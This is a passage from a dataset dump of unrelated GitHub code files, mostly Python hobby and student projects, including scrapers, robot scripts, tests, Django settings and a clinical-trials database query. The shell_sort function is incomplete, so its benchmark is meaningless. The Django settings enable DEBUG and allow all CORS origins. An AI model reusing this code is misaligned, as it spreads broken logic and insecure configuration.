json\n\n#生成地图使用的数据--腾讯\nmapUrl=\"https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5&callback=jQuery34100282751706540052_1583633749228&_=1583633749229\"\n\n#发送请求获取数据--地图数据\nmapData=requests.get(mapUrl).text.replace('\"{','{').replace('}\"})','}})').replace(\"\\\\\",\"\")\nmapData=mapData[mapData.index(\"(\")+1:-1]\n#print(type(mapData))\n#print(mapData)\n#将处理完的数据转换成Python字典\ntempMapData=json.loads(mapData)\n#各个省份的数据:每个省份的数据也是一个字典对象\nchain_provinces=tempMapData[\"data\"][\"areaTree\"][0][\"children\"]\nprint(chain_provinces)\n#保存省份名称列表\nprovince_names=[]\n#保存各个省份的确诊数据\nprovince_data=[]\nfor province in chain_provinces:\n province_names.append(province[\"name\"])\n province_data.append(province[\"total\"][\"confirm\"])\nmap=Map(\"全国疫情分布图\",width=1200,height=600)\n#第一参数:标题#第二参数:省份列表(list)#第三参数:数据列表(list)#visual_range:左侧颜色柱范围\n# #is_visualmap:是否显示颜色柱范围#visual_text_color:颜色柱初始颜色#is_label_show:文本颜色\nmap.add(\"\",province_names,province_data,maptype='china',visual_range=[0,1000],\n is_visualmap=True,\n visual_text_color='#000',is_label_show=True)\n#地图的配置参数\nmap.show_config()\n#渲染地图\nmap.render(path=\"output/全国疫情分布图.html\")\n\n\n\n\n\n\n","repo_name":"licaige/firstPython","sub_path":"txRealtime/TengXunRealtimeES.py","file_name":"TengXunRealtimeES.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74402476391","text":"#!/usr/bin/env python \n\nimport random\nimport rospy\nimport time\nimport tf\n\nfrom gazebo_msgs.msg import ModelState\n\nrospy.wait_for_service('gazebo/set_model_state')\n\npub = rospy.Publisher('/gazebo/set_model_state', ModelState, queue_size=10)\nrospy.init_node('mover', anonymous=True)\ntime.sleep(1)\nmessage=ModelState()\nmessage.model_name = \"shelf\"\nmessage.pose.position.x = random.uniform(4,6)\nmessage.pose.position.y = random.uniform(-2,2)\nquat=tf.transformations.quaternion_from_euler(0,0,random.uniform(4, 5.5))\nmessage.pose.orientation.x=quat[0]\nmessage.pose.orientation.y=quat[1]\nmessage.pose.orientation.z=quat[2]\nmessage.pose.orientation.w=quat[3]\nmessage.reference_frame=\"world\"\npub.publish(message)","repo_name":"BogdanCATANGIU/Knock_Robot","sub_path":"src/gen_random.py","file_name":"gen_random.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21161887587","text":"import time\r\nimport random\r\n\r\ndef insertion_sort(a_list):\r\n start = time.time()\r\n for index in range(1, len(a_list)):\r\n current_value = a_list[index]\r\n position = index\r\n while position > 0 and a_list[position - 1] > current_value:\r\n a_list[position] = a_list[position - 1]\r\n position = position - 1\r\n a_list[position] = current_value\r\n return time.time()-start \r\n\r\n\r\ndef shell_sort(a_list):\r\n start = time.time()\r\n sublist_count = len(a_list) // 2\r\n while sublist_count > 0:\r\n for start_position in range(sublist_count):\r\n sublist_count = sublist_count // 2\r\n return time.time()-start\r\n\r\n\r\ndef python_sort(a_list):\r\n start = time.time()\r\n a_list.sort()\r\n return time.time() - start\r\n\r\n\r\ndef main():\r\n for item in [500,1000,10000]:\r\n insr_sort = 0.0\r\n shl_sort = 0.0\r\n py_sort = 0.0 \r\n for i in range(0,100): \r\n a_list=[]\r\n for s in range(1,item):\r\n a_list.append(random.randint(1,100))\r\n insr_sort += insertion_sort(a_list)\r\n shl_sort += shell_sort(a_list)\r\n py_sort += python_sort(a_list)\r\n print(\"For \"+str(item)+\" 
Size :\") \r\n print(\"Insertion Sort took %10.7f seconds to run, on average\" % (insr_sort/100))\r\n print(\"Shell Sort took %10.7f seconds to run, on average\" % (shl_sort/100))\r\n print(\"Python Sort took %10.7f seconds to run, on average\" % (py_sort/100)) \r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"chena726/IS211_Assignment4","sub_path":"sort_compare.py","file_name":"sort_compare.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71897220073","text":"my_file = open('kalinichenko.txt', 'w')\n\nlines = []\nwhile True:\n l = input('Please insert the elements. For end insert empty space \" \": ')\n if l != ' ':\n lines.append(l + '\\n')\n else:\n my_file.writelines(lines)\n print('Input is finished. Open the file.')\n break\n\n#my_file.close()\n\n#while True:\n# line = input('Enter - ').split()\n# if not line:\n# break\n# with open('text.txt', 'a') as my_file:\n# for i in range(len(line)):\n# print(line[i]], file=my_file) \n","repo_name":"funfounder/python_basics","sub_path":"less05_task01.py","file_name":"less05_task01.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73315480873","text":"\"\"\"\n @file test_block_bingo_coordinate.py\n @author T.Miyaji\n @brief block_bingo_coordinateのテストコード\n\"\"\"\nimport pytest\nfrom BlockBingoCoordinate import Color\nfrom BlockBingoCoordinate import BlockCirclesCoordinate\nfrom BlockBingoCoordinate import CrossCirclesCoordinate\n\ndef create_block_circles(is_left = True, bonus = 6, color = 3, black = 5):\n return BlockCirclesCoordinate(is_left, bonus, color, black)\n\n\ndef check_block_circles_size(coordinate):\n # ブロックサークルが8個あることを確認\n assert len(coordinate.block_circles) == 8\n # ブロックサークルの色が1~8番サークルまで格納されていることを確認\n assert len(coordinate.block_circle_color) == 8\n\n\ndef test_init_block_circles_coordinate_left():\n \"\"\"\n Lコースのブロックサークルの座標と色を格納するデータ構造が正しく生成できることを確認する。\n \"\"\"\n coordinate = create_block_circles()\n check_block_circles_size(coordinate)\n\n\ndef test_init_block_circles_coordinate_right():\n \"\"\"\n Rコースのブロックサークルの座標と色を格納するデータ構造が正しく生成できることを確認する。\n \"\"\"\n coordinate = create_block_circles()\n check_block_circles_size(coordinate)\n \ndef test_init_block_circles_coordinate_error_bounus():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles(bonus=0)\n with pytest.raises(ValueError):\n coordinate = create_block_circles(bonus=9)\n\ndef test_init_block_circles_coordinate_error_color():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles(color=0)\n with pytest.raises(ValueError):\n coordinate = create_block_circles(color=9)\n\ndef test_init_block_circles_coordinate_error_black():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles(black=0)\n with pytest.raises(ValueError):\n coordinate = create_block_circles(black=9)\n\ndef test_get_block_circles_coordinate_error_right():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles()\n coordinate.get(9)\n \ndef test_get_block_circles_coordinate_get_color_circle():\n \"\"\"\n コンストラクタで設定したカラーブロックが置かれているサークルを返す。\n \"\"\"\n color_circle_number = 2 # ブロックサークル番号は適当\n 
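# NOTE: create_block_circles() above defaults to is_left=True, bonus=6, black=5,\n    # so only the color circle number exercised by this accessor is overridden\n    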
coordinate = create_block_circles(color=color_circle_number)\n assert coordinate.get_color_circle() == color_circle_number\n\ndef test_get_block_circles_coordinate_get_black_circle():\n \"\"\"\n コンストラクタで設定した黒ブロックが置かれているサークルを返す。\n \"\"\"\n black_circle_number = 2 # ブロックサークル番号は適当\n coordinate = create_block_circles(black=black_circle_number)\n assert coordinate.get_black_circle() == black_circle_number\n\ndef test_colors():\n \"\"\"\n ブロックサークル番号のリストを指定したとき、正しく指定したブロックサークルの色が返ることを確認する。\n \"\"\"\n coordinate = create_block_circles()\n assert [Color.YELLOW, Color.GREEN] == coordinate.colors([1, 2])\n assert [Color.YELLOW, Color.GREEN, Color.RED, Color.YELLOW, Color.BLUE] == coordinate.colors([1, 2, 3, 5, 8])\n\n\n\ndef test_init_cross_circle_corrdinate():\n \"\"\"\n 交点サークルの座標を格納するデータ構造を作成したとき、はじめは配置ブロックの色がすべてNONEになっていることを確認する。\n \"\"\"\n coordinate = CrossCirclesCoordinate()\n for y in range(3+1):\n for x in range(3+1):\n assert coordinate.cross_circles[x, y] == Color.NONE\n\n\ndef test_set_block_color():\n \"\"\"\n 交点サークルに置かれたブロックの色を設定すると、データ構造の要素も正しく変わることを確認する。\n \"\"\"\n coordinate = CrossCirclesCoordinate()\n point = (0,0)\n coordinate.set_block_color(point, Color.RED)\n assert coordinate.color(point) == Color.RED\n\n\ndef test_set_block_color_error():\n \"\"\"\n 誤った座標を指定して交点サークルに置かれたブロックの色を取得した場合、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = CrossCirclesCoordinate()\n coordinate.set_block_color((-1,0), Color.BLUE)\n\n\ndef test_goal_node():\n \"\"\"\n 走行体の初期位置とブロックサークルの座標を指定すると、ブロックを設置するための交点サークルの座標が正しく返ることを確認する。\n \"\"\"\n cross_circles = CrossCirclesCoordinate()\n block_circles = create_block_circles()\n\n assert (1,2) == cross_circles.goal_node((1,1), block_circles.get(3))\n assert (1,2) == cross_circles.goal_node((1,1), block_circles.get(5))\n assert (2,1) == cross_circles.goal_node((2,1.5), block_circles.get(7))\n assert (1,0) == cross_circles.goal_node((3,0), block_circles.get(1))\n\n\ndef test_move_block_of_cross_circle():\n \"\"\"\n 交点サークルに置かれたブロックを移動させたとき、データ構造の要素がNONEになることを確認する。\n \"\"\"\n coordinate = CrossCirclesCoordinate()\n point = (0,0)\n coordinate.set_block_color(point, Color.BLUE)\n assert coordinate.color(point) == Color.BLUE\n\n coordinate.move_block(point)\n assert coordinate.color(point) == Color.NONE\n\n\ndef test_start_node():\n coordinate = CrossCirclesCoordinate()\n # 現実的にはありえないが、交点サークルのすべてに緑色のブロックを配置する\n for x in range(0, 3+1):\n for y in range(0, 3+1):\n coordinate.set_block_color((x,y), Color.GREEN)\n \n # 走行体の現在地から最も近い交点サークルの座標を返すことを確認する。\n assert ((1,1), 0) == coordinate.start_node((1.5,1), [Color.GREEN])\n assert ((1,1), 0) == coordinate.start_node((1,1), [Color.GREEN])\n\n # 指定色のブロックが置いてある交点サークルがない場合は、Noneが返ることを確認する。\n assert None == coordinate.start_node((1,1), [Color.RED])\n\n # 1つだけ青色のブロックを置いて、正しく処理できるか確認す���\n coordinate.set_block_color((0,2), Color.BLUE)\n assert ((2,0), 2) == coordinate.start_node((2.5,0), [Color.RED, Color.BLUE, Color.GREEN])\n assert ((0,2), 1) == coordinate.start_node((2.5, 0), [Color.YELLOW, Color.BLUE])","repo_name":"KatLab-MiyazakiUniv/CameraSystem","sub_path":"source/block_bingo/test_block_bingo_coordinate.py","file_name":"test_block_bingo_coordinate.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14185437146","text":"#!/usr/bin/env python\n# import the time library for the sleep function\nimport time\n\n# import the GoPiGo3 drivers\nimport easygopigo3 as easy\n\n# Create an instance of the 
GoPiGo3 class.\n# GPG will be the GoPiGo3 object.\ngpg = easy.EasyGoPiGo3()\n\n# Put a grove button in port AD1\nmy_button = gpg.init_button_sensor(\"AD1\")\n\nprint(\"Ensure there's a button in port AD1\")\nprint(\"Press and release the button as often as you want\")\nprint(\"the program will run for 2 minutes or\")\nprint(\"Ctrl-C to interrupt it\")\n\n\nstart = time.time()\nRELEASED = 0\nPRESSED = 1\nstate = RELEASED\n\nwhile time.time() - start < 120:\n\n if state == RELEASED and my_button.read() == 1:\n print(\"PRESSED\")\n gpg.open_eyes()\n state = PRESSED\n if state == PRESSED and my_button.read() == 0:\n print(\"RELEASED\")\n gpg.close_eyes()\n state = RELEASED\n time.sleep(0.05)\n\nprint(\"All done!\")\n","repo_name":"DexterInd/GoPiGo3","sub_path":"Software/Python/Examples/easy_Button.py","file_name":"easy_Button.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"72"} +{"seq_id":"6389284618","text":"import os\nimport django_heroku\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom dotenv import load_dotenv, dotenv_values\n\nload_dotenv()\nconfig = {\n **dotenv_values(\".env.shared\"), # load shared development variables\n **dotenv_values(\".env.secret\"), # load sensitive variables\n **os.environ, # override loaded values with environment variables\n}\n\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'whitenoise.runserver_nostatic',\n 'django.contrib.staticfiles',\n\n 'drf_yasg',\n 'rest_framework',\n 'corsheaders',\n 'django_filters',\n\n 'lemka.apps.LemkaConfig',\n\n 'storages',\n]\n\nSWAGGER_SETTINGS = {\n 'SECURITY_DEFINITIONS': {\n 'Bearer': {\n 'type': 'apiKey',\n 'name': 'Authorization',\n 'in': 'header'\n }\n }\n}\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nCORS_ORIGIN_ALLOW_ALL = True\n# CORS_ORIGIN_WHITELIST = (\n# 'http://localhost:8080',\n# 'http://127.0.0.1:8080',\n# 'http://192.168.1.45:8080',\n# )\n\n# CSRF_COOKIE_SECURE = True\n\nROOT_URLCONF = 'lemka_api.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [BASE_DIR / 'templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'lemka_api.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = 
{\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = 'fr-be'\n\nTIME_ZONE = 'Europe/Brussels'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\n# Custom User Model\nAUTH_USER_MODEL = 'lemka.User'\n\nREST_FRAMEWORK = {\n # 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',\n # 'PAGE_SIZE': 10,\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n # 'rest_framework.lemka.BasicAuthentication',\n # 'rest_framework.lemka.SessionAuthentication',\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ],\n # 'DEFAULT_PERMISSION_CLASSES': [\n # 'rest_framework.permissions.IsAuthenticated',\n # 'lemka.permissions.OwnUserPermission'\n # ],\n 'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'\n}\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(hours=2),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n 'ROTATE_REFRESH_TOKENS': False,\n 'BLACKLIST_AFTER_ROTATION': True,\n 'UPDATE_LAST_LOGIN': True,\n\n 'ALGORITHM': 'HS256',\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n\n 'AUTH_HEADER_TYPES': ('Bearer',),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n# Configure Django App for Heroku.\ndjango_heroku.settings(locals())\n\n# LOGIN_URL = 'rest_framework:login'\n# LOGOUT_URL = 'rest_framework:logout'\n# LOGIN_REDIRECT_URL = '/api/v1/'\n# LOGOUT_REDIRECT_URL = '/api/v1/'\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_USE_TLS = True\nEMAIL_PORT = 587\nEMAIL_HOST_USER = config.get('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = config.get('EMAIL_HOST_PASSWORD')\nDEFAULT_FROM_EMAIL = 'Lemka - Atelier de couture'\nSOCIAL_SECRET = config.get('SOCIAL_SECRET')\nGOOGLE_CLIENT_ID = config.get('GOOGLE_CLIENT_ID')\nGOOGLE_CLIENT_SECRET = config.get('GOOGLE_CLIENT_SECRET')\nFRONTEND_URL = config.get('FRONTEND_URL')\nAPP_SCHEME = config.get('APP_SCHEME')\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nUSE_S3 = config.get('USE_S3', 'False')\nif USE_S3 and USE_S3 == 'True':\n AWS_ACCESS_KEY_ID = config.get('AWS_ACCESS_KEY_ID')\n AWS_SECRET_ACCESS_KEY = config.get('AWS_SECRET_ACCESS_KEY')\n AWS_STORAGE_BUCKET_NAME = config.get('AWS_STORAGE_BUCKET_NAME')\n AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\n\n AWS_DEFAULT_ACL = None\n AWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl': 'max-age=86400',\n }\n\n DEFAULT_FILE_STORAGE = 'lemka_api.storages.MediaStore'\nelse:\n STATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n 
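# local-development fallback: with USE_S3 disabled, uploaded media stays on disk under ./media\n    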
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n MEDIA_URL = '/media/'\n MEDIAFILES_DIRS = (\n os.path.join(BASE_DIR, 'media')\n )\n\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (str(BASE_DIR.joinpath('static')),)\nSTATIC_ROOT = str(BASE_DIR.joinpath('staticfiles'))\nSTATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'\n\n# MEDIA_URL = '/media/'\n# MEDIA_ROOT = 'media'\n","repo_name":"samadh90/lemka_api","sub_path":"lemka_api/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74011945194","text":"from Settings import HEADERS\nimport requests\nfrom data_cleaning.Extractor import Extractor\nfrom data_cleaning.content_clean import clean_content\nimport time\n\nif __name__ == '__main__':\n with open('C:/Users/叫乌鸦的少年怪/Desktop/his.txt', 'r', encoding='utf-8') as txt:\n url_list = txt.readlines()\n\n for i in range(len(url_list)):\n url = \"https://\" + url_list[i][:-1]\n try:\n response = requests.get(url, headers=HEADERS)\n html = response.text\n ex = Extractor(threshold=30)\n content = ex.filter_tags(html)\n data = clean_content(ex.getText(content))\n with open(f\"E:/c++/毕业设计开发日志/06.文本数据集/网购/淘宝/{i}.txt\", 'w+', encoding='utf-8') as file:\n file.write(data)\n print(f\"第{i+1}个淘宝网页爬取成功\")\n time.sleep(3)\n response.close()\n except Exception as e:\n print(e)\n","repo_name":"ulyyyyyy/GraduationProject_ghh","sub_path":"web_data_crawler/taobao_crawler.py","file_name":"taobao_crawler.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"1742037747","text":"import feedparser\n\ndef getFeed(url):\n feed = feedparser.parse(url)\n res = []\n for it in feed['items']:\n res.append((it[\"title\"],it[\"summary\"],it[\"link\"]))\n return res\n\ndef showFeed(feed):\n res=\"\"\n for t,s,l in feed:\n t = t.replace('\\n','')\n s = s.replace('\\n','')\n l = l.replace('\\n','')\n t = t.replace('
\\r\\n','')\n        s = s.replace('\\r\\n','')\n        l = l.replace('\\r\\n','')\n        t = t.replace('\\r\\n','')\n        s = s.replace('\\r\\n','')\n        l = l.replace('\\r\\n
','')\n res=res+t+\"\\n\"+s+\"\\n\"+l+\"\\n\\n\"\n return res \n\ndef rssF3():\n url = \"https://france3-regions.francetvinfo.fr/grand-est/actu/rss\"\n feed = getFeed(url)\n return showFeed(feed)\n\ndef rssZDnet():\n url = \"https://www.zdnet.com/news/rss.xml\"\n feed = getFeed(url)\n return showFeed(feed)\n\n","repo_name":"cerisara/tasklab","sub_path":"oneapp4all/rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"26844762666","text":"import psycopg2\nimport pandas as pd\n\n#Dl AACT db here :https://aact.ctti-clinicaltrials.org/snapshots\n#install Postgres\n\n# Data exploration. (Path to relevant files in the DB)\n\n#Clinical trials analysis\n\n#Source ctgov.studies.source\n\n#Title ctgov.studies.official_tittle /brief_tittle\n\n#Indication ctgov.conditions.name (keys : nct_id; id)\n\n#Objectives Primary/secondary/ Endpoint outcome ctgov.outcomes.outcome_type\n\n#Number previous of studies/ results of previous phases ??\n\n#Study protocol ctgov.detailed_descriptions\n\n#Analysis plan to evaluate the endpoints (Intention to treat?) ctgov.outcomes.population (Intent-to-treat)\n\n#Hypothesis tested H0 ????\n\n#Clinical outcome of interest ctgov.outcomes.outcome_type/title/desciption\n\n#METHODS:\n\n#- Name of the method ctgov.outcome_analyses.method\n\n#- Type of studies (random/blind x2+) ctgov.studies.phase\n\n#- Number of participant ctgov.studies.enrollement\n\n#- Interventions (type of drugs given) ctgov.interventions.intervention_type/name/description/// ctgov.design_groups.title/description/timeframe (id; nct_id)\n\n#- Evaluation method ctgov.outcome_analyses.method (t_test, ancova)/ method_description/ groups_description (Week 8 etc.)\n\n#- Parameters ctgov.outcome_analyses.param_type / param_value / p_value/ p_value_description/ ci_n_sides/ ci_percent/ ci_lower_limit/ ci_upper_limit/\n\n#Baseline values ctgov.baseline_measurements.title/ units/ param_value\n\n#Delta to placebo (control group) ????\n\n#Primary/Sec Endpoint outcome ctgov.outcomes.outcome_type/ title/ description/ time_frame/ population\n\n#Group selection ????\n\n#Previous papers ????\n\n#Authors rep ????\n\n#Sponsor/author conflict of interest ????\n\nhostname = 'localhost'\ndatabase = 'aact'\nusername = 'postgres'\npwd = '*******'\nport_id = 5432\nconn = None\ncur= None\n\ntry:\n conn = psycopg2.connect(dbname=database, user= username, password= pwd, host=hostname, port= port_id)\n cur = conn.cursor()\n \n dfdes = pd.read_sql_query(\"select * from ctgov.designs where ctgov.designs.allocation ='Randomized' and ctgov.designs.primary_purpose = 'Treatment' and ctgov.designs.masking = 'Quadruple'or ctgov.designs.masking = 'Triple' or ctgov.designs.masking = 'Double'\", con=conn)\n #print(dfdes)\n #print(dfdesc['intervention_model_description'].value_counts())\n \n dfphase = pd.read_sql_query(\"SELECT * FROM ctgov.studies where ctgov.studies.phase = 'Phase 3' and ctgov.studies.is_fda_regulated_drug = False;\", con=conn )\n #print(dfphase)\n dfoutcome = pd.read_sql_query(\"select * from ctgov.outcome_analyses\", con=conn)\n #print(dfoutcome)\n #print(dfoutcome['method'].value_counts())\n \n dfjoin_des_out =pd.read_sql_query(\"select * from ctgov.outcome_analyses where nct_id in (select ctgov.designs.nct_id from ctgov.designs where ctgov.designs.allocation ='Randomized' and ctgov.designs.primary_purpose = 'Treatment' and ctgov.designs.masking = 'Quadruple'or ctgov.designs.masking = 'Triple' or 
ctgov.designs.masking = 'Double');\", con=conn)\n #print(dfjoin_des_out)\n query= \"create table ctgov.join as select * from ctgov.studies inner join ctgov.outcome_analyses using (nct_id);\"\n dfj = pd.read_sql_query(query, con=conn)\n \n \n conn.close()\n cur.close()\nfinally:\n if conn is not None :\n conn.close()\n if cur is not None :\n cur.close()\n\n","repo_name":"Git0BF/Ctrials","sub_path":"Ctrials.py","file_name":"Ctrials.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40690394419","text":"import logging\nimport logging.handlers\nfrom logging import DEBUG,INFO,WARNING,ERROR,CRITICAL\n\n\nLOGFILE = 'runtime.log'\n\n_logrotate = logging.handlers.RotatingFileHandler(\n LOGFILE, backupCount=2, delay=True)\n_logrotate.setFormatter(\n logging.Formatter(\n '%(asctime)s %(levelname)-4.4s %(name)-20s: %(message)s'))\n# Force a log rotation each time we start up\n_logrotate.doRollover()\n\ndef getLogger(name):\n logger = logging.getLogger(name)\n logger.addHandler(_logrotate)\n\n logger.setLevel(DEBUG)\n\n return logger\n\n","repo_name":"Kromey/roglick","sub_path":"roglick/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"17908606970","text":"from wpi.port import TCPIPPort, RAW, LPR, LocalPort\n\n\nclass ParameterError(Exception):\n pass\n\n\nclass RAWPort(TCPIPPort):\n def __init__(self, address, port=None, name=None, enable_snmp=False, snmp_dev_index=None, snmp_comunity=None):\n super().__init__()\n\n self.protocol = RAW\n self.address = address\n self.port = port or 9100\n\n self.__dict__['name'] = '{}:{}'.format(name or address, str(self.port))\n\n self.enable_snmp = enable_snmp\n self.snmp_dev_index = snmp_dev_index\n self.snmp_comunity = snmp_comunity\n\n\nclass LPRPort(TCPIPPort):\n def __init__(self, address, port=None, name=None, enable_snmp=False, snmp_dev_index=None, snmp_comunity=None,\n queue_name=None, is_enable_byte_count=False):\n super().__init__()\n\n self.protocol = LPR\n self.address = address\n self.port = port or 515\n\n self.__dict__['name'] = '{}:{}'.format(name or address, str(self.port))\n\n self.enable_snmp = enable_snmp\n self.snmp_dev_index = snmp_dev_index\n self.snmp_comunity = snmp_comunity\n\n self.queue_name = queue_name\n self.is_enable_byte_count = is_enable_byte_count\n\n\nclass SMBPort(LocalPort):\n def __init__(self, name):\n super().__init__(None)\n self.name = name\n\n\nclass Driver:\n def __init__(self, name, archive=None, inf_in_archive=None, inf_path=None):\n if bool(archive) and bool(inf_path):\n raise ParameterError\n\n self.name = name\n self.archive = archive\n self.inf_in_archive = inf_in_archive\n self.inf_path = inf_path\n\n\nclass Printer:\n def __init__(self, port, driver, name=None):\n self.port = port\n self.driver = driver\n self.name = name or driver\n\n\ndef ep(address, driver, name=None, protocol=None, ipport=None, archive=None, inf=None):\n\n if address.startswith('\\\\\\\\'):\n port = SMBPort(address)\n\n else:\n if protocol == RAW:\n port = RAWPort(address, ipport)\n elif protocol == LPR:\n port = LPRPort(address, ipport)\n\n elif protocol is None:\n\n if ipport is None:\n port = RAWPort(address)\n elif ipport >= 9100:\n port = RAWPort(address, ipport)\n else:\n port = LPRPort(address, ipport)\n\n else:\n raise ParameterError\n\n if archive:\n driver_obj = Driver(driver, archive, 
inf_in_archive=inf)\n else:\n driver_obj = Driver(driver, inf_path=inf)\n\n return Printer(port, driver_obj, name)\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source_2/1420.py","file_name":"1420.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"23304235776","text":"import math\r\nfrom time import sleep\r\n\r\nfrom behave import given, then, use_step_matcher, step\r\nimport sys\r\n\r\nfrom functions.support_functions.webdriver_actions import by_css\r\nfrom functions.support_functions.support import factorialtest\r\n\r\nuse_step_matcher(\"re\")\r\n\r\n\r\n@given(\"UI: I am on factorial calculator page\")\r\ndef check_login_page(context):\r\n try:\r\n context.browser.get('https://cameramatics.pythonanywhere.com/')\r\n sleep(10)\r\n title_text = context.browser.title()\r\n if \"Factorial\" == title_text:\r\n pass\r\n else:\r\n sys.exit(1)\r\n except Exception as e:\r\n context.exc = e\r\n\r\n\r\n@given(u'UI: Input an integer 